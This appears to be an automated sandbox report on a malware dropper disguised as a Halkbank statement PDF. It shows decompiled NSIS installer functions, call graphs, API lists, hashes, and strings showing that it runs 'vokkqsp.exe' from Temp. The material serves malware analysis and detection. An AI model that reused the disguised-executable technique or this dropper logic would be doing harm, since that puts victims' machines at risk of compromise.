                                                      • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: H7B
                                                      • API String ID: 2475350683-2300413410
                                                      • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                      • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                      • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                      • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                      C-Code - Quality: 96%
                                                      			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                      0x00403d1d
                                                      0x00403d26
                                                      0x00403d2d
                                                      0x00403d2f
                                                      0x00403d43
                                                      0x00403d55
                                                      0x00403d5e
                                                      0x00403d67
                                                      0x00403d6e
                                                      0x00403d73
                                                      0x00403d7a
                                                      0x00403d8d
                                                      0x00403d8d
                                                      0x00403d98
                                                      0x00403d31
                                                      0x00403d3c
                                                      0x00403d3c
                                                      0x00403d9d
                                                      0x00403da7
                                                      0x00403db0
                                                      0x00403db5
                                                      0x00403dc6
                                                      0x00403e58
                                                      0x00403e60
                                                      0x00403e69
                                                      0x00403e69
                                                      0x00403e7f
                                                      0x00403e85
                                                      0x00403e93
                                                      0x00403f14
                                                      0x00403f1c
                                                      0x00403f26
                                                      0x00403f2b
                                                      0x00403f31
                                                      0x00403fbb
                                                      0x00403fc0
                                                      0x00403fc2
                                                      0x00403fde
                                                      0x00000000
                                                      0x00403fde
                                                      0x00403fc4
                                                      0x00403fca
                                                      0x00403fd2
                                                      0x00403fd2
                                                      0x00000000
                                                      0x00403fca
                                                      0x00403f3f
                                                      0x00403f4a
                                                      0x00403f4f
                                                      0x00403f51
                                                      0x00403f58
                                                      0x00403f58
                                                      0x00403f63
                                                      0x00403f6b
                                                      0x00403f6d
                                                      0x00403f6f
                                                      0x00403f78
                                                      0x00403f7b
                                                      0x00403f81
                                                      0x00403f81
                                                      0x00403fa0
                                                      0x00403fb1
                                                      0x00000000
                                                      0x00403fb6
                                                      0x00403f1e
                                                      0x00403f20
                                                      0x00000000
                                                      0x00403e95
                                                      0x00403e95
                                                      0x00403ea1
                                                      0x00403eab
                                                      0x00403eb1
                                                      0x00403eb6
                                                      0x00403ec5
                                                      0x00403fe3
                                                      0x00403fe3
                                                      0x00000000
                                                      0x00403fe3
                                                      0x00403ed4
                                                      0x00403f0f
                                                      0x00000000
                                                      0x00403f0f
                                                      0x00403dcc
                                                      0x00403dcc
                                                      0x00403dcf
                                                      0x00403dd1
                                                      0x00000000
                                                      0x00000000
                                                      0x00403ddf
                                                      0x00403df1
                                                      0x00403df6
                                                      0x00403dff
                                                      0x00000000
                                                      0x00000000
                                                      0x00403e05
                                                      0x00403e07
                                                      0x00403e14
                                                      0x00403e14
                                                      0x00403e1d
                                                      0x00403e23
                                                      0x00403e4b
                                                      0x00403e53
                                                      0x00000000
                                                      0x00403e35
                                                      0x00403e36
                                                      0x00403e3f
                                                      0x00403e45
                                                      0x00403e46
                                                      0x00000000
                                                      0x00403e46
                                                      0x00403e41
                                                      0x00403e43
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403e43
                                                      0x00403e23

                                                      APIs
                                                        • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                        • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                      • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                      • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,?,?,?,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7476FAA0), ref: 00403E18
                                                      • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,?,?,?,"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                      • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf,?,00000000,?), ref: 00403E36
                                                      • LoadImageW.USER32 ref: 00403E7F
                                                        • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                      • RegisterClassW.USER32 ref: 00403EBC
                                                      • SystemParametersInfoW.USER32 ref: 00403ED4
                                                      • CreateWindowExW.USER32 ref: 00403F09
                                                      • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                      • GetClassInfoW.USER32 ref: 00403F6B
                                                      • GetClassInfoW.USER32 ref: 00403F78
                                                      • RegisterClassW.USER32 ref: 00403F81
                                                      • DialogBoxParamW.USER32 ref: 00403FA0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                      • API String ID: 1975747703-3330949211
                                                      • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                      • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                      • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                      • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                      C-Code - Quality: 98%
                                                      			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\jones\\Desktop", L"C:\\Users\\jones\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                                      0x004030db
                                                      0x004030de
                                                      0x004030e1
                                                      0x004030fb
                                                      0x00403100
                                                      0x00403113
                                                      0x00403118
                                                      0x0040311e
                                                      0x00000000
                                                      0x00403120
                                                      0x00403131
                                                      0x00403142
                                                      0x00403149
                                                      0x00403151
                                                      0x00403156
                                                      0x00403158
                                                      0x00403243
                                                      0x00403245
                                                      0x00403251
                                                      0x00000000
                                                      0x00000000
                                                      0x0040325a
                                                      0x00403286
                                                      0x0040328b
                                                      0x00403296
                                                      0x00403298
                                                      0x004032a9
                                                      0x004032c4
                                                      0x004032cd
                                                      0x004032d2
                                                      0x004032f1
                                                      0x00403301
                                                      0x00403313
                                                      0x00403318
                                                      0x00403320
                                                      0x0040332d
                                                      0x00403335
                                                      0x0040333a
                                                      0x0040333c
                                                      0x0040333c
                                                      0x00403344
                                                      0x00403344
                                                      0x00403347
                                                      0x00403348
                                                      0x00403348
                                                      0x0040334b
                                                      0x0040334d
                                                      0x0040334d
                                                      0x00403357
                                                      0x00403363
                                                      0x00000000
                                                      0x00403368
                                                      0x00000000
                                                      0x00403320
                                                      0x00000000
                                                      0x004032d4
                                                      0x00403262
                                                      0x00403274
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040315e
                                                      0x00403163
                                                      0x00403168
                                                      0x0040316c
                                                      0x00403173
                                                      0x0040317a
                                                      0x0040317c
                                                      0x0040317c
                                                      0x00403187
                                                      0x004032e0
                                                      0x00403322
                                                      0x00000000
                                                      0x00403322
                                                      0x00403194
                                                      0x00403214
                                                      0x00403218
                                                      0x0040321d
                                                      0x00000000
                                                      0x00403214
                                                      0x0040319d
                                                      0x004031a2
                                                      0x004031aa
                                                      0x004031d0
                                                      0x004031df
                                                      0x004031e5
                                                      0x004031ea
                                                      0x004031f0
                                                      0x00000000
                                                      0x00000000
                                                      0x004031fa
                                                      0x00403202
                                                      0x00403205
                                                      0x0040320a
                                                      0x0040320c
                                                      0x0040320c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004031fa
                                                      0x0040321e
                                                      0x00403224
                                                      0x00403230
                                                      0x00403230
                                                      0x00403233
                                                      0x00403239
                                                      0x00403239
                                                      0x00403241
                                                      0x00000000
                                                      0x00403241

                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004030E4
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,00000400), ref: 00403100
                                                        • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                        • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                      • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00403149
                                                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 2803837635-721760834
                                                      • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                      • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                      • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                      • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                      C-Code - Quality: 77%
                                                      			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
